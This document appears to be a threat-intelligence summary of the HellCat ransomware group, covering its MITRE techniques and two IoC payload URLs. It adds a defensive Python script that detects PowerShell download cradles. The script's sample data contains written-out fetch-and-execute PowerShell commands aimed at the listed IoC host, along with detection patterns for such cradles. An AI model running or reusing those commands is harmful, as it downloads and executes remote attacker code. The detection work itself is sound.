HellCat Ransomware is a cyber extortion group that emerged in 2024 and targets organizations through phishing and the exploitation of vulnerabilities in public-facing applications. Its operations centre on data exfiltration followed by aggressive ransom demands, and it frequently collaborates with the Morpheus group. This article analyzes the group's tactics, techniques, and procedures to better understand the threat it poses.
Affected: organizations, cyber security sectors
Key points:
- HellCat Ransomware specializes in targeted cyber extortion and data exfiltration.
- The group uses sophisticated phishing tactics, including malicious email attachments.
- They exploit vulnerabilities in public-facing applications, particularly targeting systems like Atlassian Jira.
- They employ a double extortion tactic, exfiltrating sensitive data before encrypting systems.
- HellCat utilizes attention-grabbing ransom demands to increase pressure on victims.
- Common tools are used in their operations to avoid detection, allowing stealthy lateral movement.
- A layered defense approach is recommended for organizations to mitigate HellCat ransomware attacks.
MITRE Techniques:
- T1566.001: Phishing: Spearphishing Attachment – Use of spearphishing emails with malicious attachments for initial access.
- T1190: Exploit Public-Facing Application – Targeting vulnerabilities in systems to gain remote access.
- T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Adding malicious scripts to Windows Registry to ensure they execute at login.
- T1620: Reflective Code Loading – Executing malicious code in memory to evade file detection.
- T1562.001: Disable or Modify Tools – Bypassing Antimalware Scan Interface to execute PowerShell malware unimpeded.
- T1059.001: Command and Scripting Interpreter: PowerShell – Using PowerShell scripts for executing payloads and establishing C2 channels.
- T1046: Network Service Discovery – Utilizing tools like Netscan for mapping networks.
- T1218: Signed Binary Proxy Execution – Executing malicious actions using trusted binaries.
- T1021: Remote Services – Leveraging legitimate remote utilities for lateral movement.
- T1078: Valid Accounts – Using stolen or default credentials for stealth operations.
Indicators of Compromise:
- [URL] http://45.200.148.157:8878/payload.ps1
- [URL] http://45.200.148.157:8878/payload2.ps1
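The persistence (T1547.001), PowerShell (T1059.001) and reflective loading (T1620) entries above describe one chain: a Run-key value that launches PowerShell, which fetches a script from the listed URLs and runs it in memory. The following is an added defender-side example, not code from the Picus Security write-up, that checks Run-key values and PowerShell script-block log text for the two IoC URLs on this page and for generic download-cradle markers. The registry values and log lines it scans are constructed sample data, and the cradle patterns are a general heuristic rather than signatures tied to this group.

```python
"""
Added example (not from the original write-up): scan Windows Run-key values
and PowerShell script-block log text for the IoC URLs listed on this page and
for generic PowerShell download-cradle markers.  All sample registry values
and log lines below are constructed for the demonstration.
"""
import re
from dataclasses import dataclass

# IoC URLs taken from the Indicators of Compromise section of this page.
IOC_URLS = {
    "http://45.200.148.157:8878/payload.ps1",
    "http://45.200.148.157:8878/payload2.ps1",
}

# Generic markers of PowerShell fetching remote code and running it in memory.
# These are broad heuristics (assumption: tuned per environment), not
# indicators specific to HellCat.
CRADLE_PATTERNS = [
    re.compile(r"DownloadString\s*\(", re.IGNORECASE),
    re.compile(r"Invoke-WebRequest|\biwr\b", re.IGNORECASE),
    re.compile(r"Invoke-Expression|\biex\b", re.IGNORECASE),
    re.compile(r"-EncodedCommand|\s-e(nc)?\s", re.IGNORECASE),
]


@dataclass
class Finding:
    source: str   # "runkey" or "scriptblock"
    reason: str   # which rule matched
    excerpt: str  # the text that triggered the finding


def _ioc_hits(text: str) -> list[str]:
    return [u for u in IOC_URLS if u in text]


def _cradle_hits(text: str) -> list[str]:
    return [p.pattern for p in CRADLE_PATTERNS if p.search(text)]


def check_run_keys(run_values: dict[str, str]) -> list[Finding]:
    """Inspect Run-key name -> command pairs (T1547.001 persistence)."""
    findings = []
    for name, cmd in run_values.items():
        for url in _ioc_hits(cmd):
            findings.append(Finding("runkey", f"known IoC URL {url}", f"{name}={cmd}"))
        # A PowerShell download cradle in an autostart location is suspicious
        # regardless of which URL it points at.
        if "powershell" in cmd.lower() and _cradle_hits(cmd):
            findings.append(Finding("runkey", "PowerShell download cradle in autostart", f"{name}={cmd}"))
    return findings


def check_scriptblocks(log_lines: list[str]) -> list[Finding]:
    """Inspect PowerShell script-block log text (Event ID 4104) for IoC URLs
    and download cradles (T1059.001 / T1620)."""
    findings = []
    for line in log_lines:
        for url in _ioc_hits(line):
            findings.append(Finding("scriptblock", f"known IoC URL {url}", line.strip()))
        cradles = _cradle_hits(line)
        if cradles:
            findings.append(Finding("scriptblock", "download cradle: " + ", ".join(cradles), line.strip()))
    return findings


# Constructed sample data: one benign and one suspicious Run-key value.
SAMPLE_RUN_VALUES = {
    "OneDriveSync": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe /background",
    "Updater": 'powershell.exe -w hidden -c "iex (iwr http://45.200.148.157:8878/payload.ps1)"',
}

# Constructed sample script-block log text (Event ID 4104 style).
SAMPLE_SCRIPTBLOCKS = [
    "4104 ScriptBlockText: Get-Process | Where-Object { $_.CPU -gt 100 }",
    "4104 ScriptBlockText: $c=New-Object Net.WebClient; $c.DownloadString('http://45.200.148.157:8878/payload2.ps1')",
    "4104 ScriptBlockText: Import-Module ActiveDirectory; Get-ADUser -Filter *",
]


def run_demo() -> dict[str, int]:
    """Run both checks over the sample data and return finding counts."""
    rk = check_run_keys(SAMPLE_RUN_VALUES)
    sb = check_scriptblocks(SAMPLE_SCRIPTBLOCKS)
    for f in rk + sb:
        print(f"[{f.source}] {f.reason}: {f.excerpt}")
    return {"runkey": len(rk), "scriptblock": len(sb)}


if __name__ == "__main__":
    run_demo()
```

On a live host the Run-key values would come from HKCU and HKLM `...\CurrentVersion\Run` and the script-block text from the Microsoft-Windows-PowerShell/Operational log with script-block logging enabled; the matching logic is the same. Matching the exact IoC URLs gives a high-confidence hit, while the cradle patterns are a broad net that will also catch legitimate administration scripts and should be reviewed rather than blocked on automatically.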
Full Story: https://www.picussecurity.com/resource/blog/hellcat-ransomware